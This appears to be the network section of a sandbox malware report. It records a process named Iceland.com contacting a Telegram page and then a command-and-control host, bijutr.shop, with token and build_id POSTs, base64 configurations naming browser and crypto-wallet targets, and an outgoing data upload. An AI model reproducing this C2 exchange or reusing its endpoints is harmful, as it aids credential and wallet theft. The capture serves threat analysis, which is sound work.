Dec 27, 2024 07:09:25.738939047 CET | 53 | 49418 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:27.704071999 CET | 49853 | 53 | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 07:09:27.843633890 CET | 53 | 49853 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:44.408648014 CET | 53 | 62615 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:44.450326920 CET | 53 | 52527 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:44.611745119 CET | 60385 | 53 | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 07:09:44.612502098 CET | 64197 | 53 | 192.168.2.4 | 1.1.1.1
Dec 27, 2024 07:09:44.748589039 CET | 53 | 60385 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:44.749243021 CET | 53 | 64197 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:47.289989948 CET | 53 | 54627 | 1.1.1.1 | 192.168.2.4
Dec 27, 2024 07:09:48.708857059 CET | 53 | 64241 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 07:09:10.876012087 CET | 192.168.2.4 | 1.1.1.1 | 0x8df2 | Standard query (0) | pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:25.600939989 CET | 192.168.2.4 | 1.1.1.1 | 0xcd36 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:27.704071999 CET | 192.168.2.4 | 1.1.1.1 | 0x971 | Standard query (0) | bijutr.shop | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:44.611745119 CET | 192.168.2.4 | 1.1.1.1 | 0x8c84 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:44.612502098 CET | 192.168.2.4 | 1.1.1.1 | 0xcaa9 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 07:09:11.094137907 CET | 1.1.1.1 | 192.168.2.4 | 0x8df2 | Name error (3) | pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe | none | none | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:25.738939047 CET | 1.1.1.1 | 192.168.2.4 | 0xcd36 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:27.843633890 CET | 1.1.1.1 | 192.168.2.4 | 0x971 | No error (0) | bijutr.shop | | 188.245.216.205 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:44.748589039 CET | 1.1.1.1 | 192.168.2.4 | 0x8c84 | No error (0) | www.google.com | | 172.217.21.36 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 07:09:44.749243021 CET | 1.1.1.1 | 192.168.2.4 | 0xcaa9 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                                                                                                                                                                                                                                                              • t.me
                                                                                                                                                                                                                                                              • bijutr.shop
                                                                                                                                                                                                                                                              • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 149.154.167.99 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:27 UTC | 85 | OUT | GET /k04ael HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:27 UTC | 511 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 27 Dec 2024 06:09:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12298
Connection: close
Set-Cookie: stel_ssid=cd07a4f893f6d3434c_2352031337646591415; expires=Sat, 28 Dec 2024 06:09:27 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-27 06:09:27 UTC | 12298 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @k04ael</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:29 UTC | 231 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:30 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:32 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----XT0RIWTJM7GV3E3OPZU3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 255
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:32 UTC | 255 | OUT | Data Ascii: ------XT0RIWTJM7GV3E3OPZU3Content-Disposition: form-data; name="hwid"CE375D20EB0F807656615-a33c7340-61ca------XT0RIWTJM7GV3E3OPZU3Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------XT0RIWTJM7GV3E3OPZU3--
2024-12-27 06:09:32 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:32 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3a1|1|1|1|d6efe9e6f5b734065d29d7e36ae274f3|1|0|1|1|0|50000|00


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:34 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----W4EUAIMGLN7YMYCB1NOP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:34 UTC | 331 | OUT | Data Ascii: ------W4EUAIMGLN7YMYCB1NOPContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------W4EUAIMGLN7YMYCB1NOPContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------W4EUAIMGLN7YMYCB1NOPCont
2024-12-27 06:09:35 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:09:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:09:35 UTC | 2192 | IN | Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:37 UTC | 323 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----479RQ1NOHDJMYMYU3ECB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:09:37 UTC | 331 | OUT | Data Ascii: ------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------479RQ1NOHDJMYMYU3ECBContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------479RQ1NOHDJMYMYU3ECBCont
2024-12-27 06:09:38 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:37 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:09:38 UTC | 5837 | IN
                                                                                                                                                                                                                                                              Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49744 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:39 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----1NG4WBAS0ZUAAIWBIWL6
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 332
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:09:39 UTC | 332 | OUT
                                                                                                                                                                                                                                                              Data Ascii: ------1NG4WBAS0ZUAAIWBIWL6Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------1NG4WBAS0ZUAAIWBIWL6Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------1NG4WBAS0ZUAAIWBIWL6Cont
2024-12-27 06:09:40 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:40 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:09:40 UTC | 119 | IN
                                                                                                                                                                                                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49745 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:42 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZMYUKN7900ZU37YMY5FK
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 7617
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:09:42 UTC | 7617 | OUT
                                                                                                                                                                                                                                                              Data Ascii: ------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------ZMYUKN7900ZU37YMY5FKCont
2024-12-27 06:09:43 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:09:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49746 | 188.245.216.205 | 443 | 7592 | C:\Users\user\AppData\Local\Temp\314782\Iceland.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:43 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZMYUKN7900ZU37YMY5FK
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 489
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
2024-12-27 06:09:43 UTC | 489 | OUT
                                                                                                                                                                                                                                                              Data Ascii: ------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------ZMYUKN7900ZU37YMY5FKContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------ZMYUKN7900ZU37YMY5FKCont
2024-12-27 06:09:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:44 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
2024-12-27 06:09:44 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49752 | 172.217.21.36 | 443 | 3844 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:46 UTC | 607 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-27 06:09:47 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:47 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pU07PemUoTZ-5NtAikWO2w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49753 | 172.217.21.36 | 443 | 3844 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:09:46 UTC | 510 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
2024-12-27 06:09:47 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:47 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                              Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                              Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC194INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700333,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC235INData Raw: 65 35 0d 0a 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: e5_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.
